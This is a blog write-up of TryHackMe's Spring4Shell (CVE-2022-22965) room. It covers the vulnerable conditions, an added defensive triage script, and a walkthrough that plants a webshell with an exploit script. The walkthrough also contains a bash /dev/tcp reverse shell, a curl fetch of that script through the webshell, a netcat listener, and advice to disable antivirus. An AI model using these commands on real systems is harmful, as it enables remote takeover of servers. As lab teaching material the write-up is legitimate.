The Dutch Hacker

Spring4Shell: CVE-2022-22965 on Tryhackme

This is the write-up for the Spring4Shell room on TryHackMe.

Connect with the VPN or use the AttackBox on the TryHackMe site to reach the TryHackMe lab environment.

Limitations

Fortunately, despite how commonly used the Spring Framework is, the conditions in which the vulnerability can be exploited are actually fairly limited.

The Spring4Shell vulnerability affects Spring Core before version 5.2, as well as in versions 5.3.0-17 and 5.2.0-19, running on a version of the Java Development Kit (JDK) greater than or equal to 9. The publicly available exploits currently available only work on applications deployed to Apache Tomcat as WARs; however, the Spring Framework maintainers have stated that they believe there may be other ways to exploit the vulnerability.

Current conditions for vulnerability (as stated in Spring’s announcement of the vulnerability) can be summarised as follows:

  • JDK 9+
  • A vulnerable version of the Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat as a server for the Spring application, packaged as a WAR
  • A dependency on the spring-webmvc and/or spring-webflux components of the Spring Framework

It is worth noting, however, that these may change over time as other ways to exploit the vulnerability are discovered.
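As an added triage example (not code from the room or from this write-up), the conditions listed above turned into a check you can run over an inventory of deployments; the version strings and deployment records are constructed samples, and the function and field names are my own:

```python
# Added example (not from the TryHackMe room or this write-up): the Spring4Shell
# conditions listed above as a triage check. Deployment records are constructed.
def parse_version(version: str) -> tuple:
    """'5.3.17.RELEASE' -> (5, 3, 17); a non-numeric suffix is ignored."""
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple((parts + [0, 0, 0])[:3])

def spring_version_affected(version: str) -> bool:
    """True for Spring Core < 5.2, 5.2.0-5.2.19 and 5.3.0-5.3.17."""
    major, minor, patch = parse_version(version)
    if (major, minor) < (5, 2):
        return True
    if (major, minor) == (5, 2):
        return patch <= 19
    if (major, minor) == (5, 3):
        return patch <= 17
    return False

def unmet_conditions(spring_version: str, jdk_major: int, container: str,
                     packaging: str, web_dependency: bool) -> list:
    """Known exploitation conditions a deployment does NOT meet (empty = all hold)."""
    unmet = []
    if not spring_version_affected(spring_version):
        unmet.append("Spring version outside the affected ranges")
    if jdk_major < 9:
        unmet.append("JDK older than 9")
    if container.lower() != "tomcat" or packaging.lower() != "war":
        unmet.append("not deployed as a WAR on Tomcat")
    if not web_dependency:  # spring-webmvc and/or spring-webflux
        unmet.append("no spring-webmvc/spring-webflux dependency")
    return unmet

def triage(inventory: dict) -> dict:
    """name -> True when every currently known condition is met (patch first)."""
    return {name: not unmet_conditions(**fields) for name, fields in inventory.items()}

# Constructed sample inventory; the field names match unmet_conditions().
SAMPLE_INVENTORY = {
    "shop-api": dict(spring_version="5.3.17.RELEASE", jdk_major=11,
                     container="tomcat", packaging="war", web_dependency=True),
    "legacy-portal": dict(spring_version="5.2.20", jdk_major=11,
                          container="tomcat", packaging="war", web_dependency=True),
    "boot-service": dict(spring_version="5.3.16", jdk_major=17,
                         container="embedded", packaging="jar", web_dependency=True),
}
```

A deployment that fails only the Tomcat/WAR or JDK condition is still on a vulnerable Spring version and should be patched, since the list of conditions may grow.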

Tasks Spring4Shell

Task 1

Start the machine attached to this task and press complete

Task 2

Read all that is in this task and press complete

Task 3

Download the attached file and unzip it. If you download it on Windows, make sure your virus scanner is off, as it will detect and delete the file. Use the password provided in the task to unzip it.

Look at the website's source and notice a POST request on the website.


This website is vulnerable and we can now attack it by typing in the following command (change the IP address to that of your vulnerable machine):

./exploit.py http://10.10.168.174/

It uploaded the webshell.


You can now enter commands after the cmd=

3.1 [Bonus Question: Optional]
Use your webshell to obtain a reverse/bind shell on the target.

Create a script with the following content and call it reverse.sh

#!/bin/bash
bash -i >& /dev/tcp/<YOUR MACHINE IP>/443 0>&1

Make the script executable:

chmod 777 reverse.sh

Start a web server with Python:

python3 -m http.server 80

Now that we have the script ready we need to upload it to the server


Put this after the cmd=

curl%2010.9.135.33/reverse.sh%20-o%20/dev/shm/reverse.sh

Open a listener on your machine by typing

nc -nlvp 443

Now execute the script on the server by putting this after the cmd=

bash%20/dev/shm/reverse.sh

3.2 What is the flag in /root/flag.txt?

Now that you have a reverse shell you can type in cat /root/flag.txt to get the flag
